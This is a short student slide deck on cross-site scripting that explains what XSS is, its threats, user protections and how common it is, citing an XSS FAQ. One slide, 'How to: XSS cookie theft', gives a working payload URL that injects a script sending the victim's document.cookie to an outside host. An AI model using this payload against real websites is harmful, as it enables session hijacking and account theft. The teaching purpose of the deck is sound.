80 likes | 201 Vues
LAÏMOUCHE El Hadj, DAVY Benjamin. Information Systems Security. Cross Site Scripting. What is Cross Site Scripting ?. Users data gathered by a website . Using malicious code hidden in links, posts on a board or e-mails. Encoded to be less suspicious : e.g . in HEX.
E N D
LAÏMOUCHE El Hadj, DAVY Benjamin Information Systems Security Cross Site Scripting source : http://www.cgisecurity.com/articles/xss-faq.shtml
What is Cross Site Scripting ? • Users data gathered by a website. • Usingmalicious code hidden in links, posts on a board or e-mails. • Encoded to belesssuspicious : e.g. in HEX. source : http://www.cgisecurity.com/articles/xss-faq.shtml
What does XSS and CSS mean ? • Often people refer to Cross Site Scripting as CSS. • CSS is also used for Cascading Style Sheets. • Whenyousee XSS youcanbe sure it’stalking about the securitythreat. source : http://www.cgisecurity.com/articles/xss-faq.shtml
What are the threats of Cross Site Scripting ? • Injection of JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user. • Account, users settings, cookie theft, false advertising is possible. source : http://www.cgisecurity.com/articles/xss-faq.shtml
How to : XSS cookie theft • Target a websiteusingcookies. • Test how itworks and whereit’s possible to insert code (e.g. enabled HTML in a form). • Javascript code : http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script> source : http://www.cgisecurity.com/articles/xss-faq.shtml
How to protectmyself ? • Follow links from the main website. • Be careful XSS canbeexecutedautomaticallywhenyou open an e-mail, read a guestbook … • Turn off javascript. • Encryptionisuseless. source : http://www.cgisecurity.com/articles/xss-faq.shtml
How common are XSS holes? • Websitesfrom FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs. • 10-25 XSS holes are foundeverymonth. source : http://www.cgisecurity.com/articles/xss-faq.shtml
It’s over • Any questions ? source : http://www.cgisecurity.com/articles/xss-faq.shtml